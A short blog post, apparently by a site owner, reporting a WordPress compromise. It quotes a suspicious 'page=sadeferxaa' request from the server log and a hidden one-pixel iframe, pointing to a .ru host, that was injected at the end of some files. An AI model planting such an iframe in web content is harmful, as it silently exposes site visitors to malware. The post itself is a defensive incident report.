sadeferxaa

Posted on

I’m getting errors in my log file with “sadeferxaa” in the url request:

IP: 92.243.84.187
Page Requested: /index.php?page=sadeferxaa
Browser Signature: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)

WordPress was also compromised with the following data injected at the end of some files:

<html><body><iframe src=”http://eftpsid0342943.ru/contacts/s3″ width=1 height=1></iframe></body></html>

I’m trying to track down the source of the compromise, please comment if you have a similar experience with this.

Related Posts:

  • No Related Posts
This entry was posted in Tech Tips and tagged . Bookmark the permalink.

3 Responses to sadeferxaa

Leave a Reply

Your email address will not be published. Required fields are marked *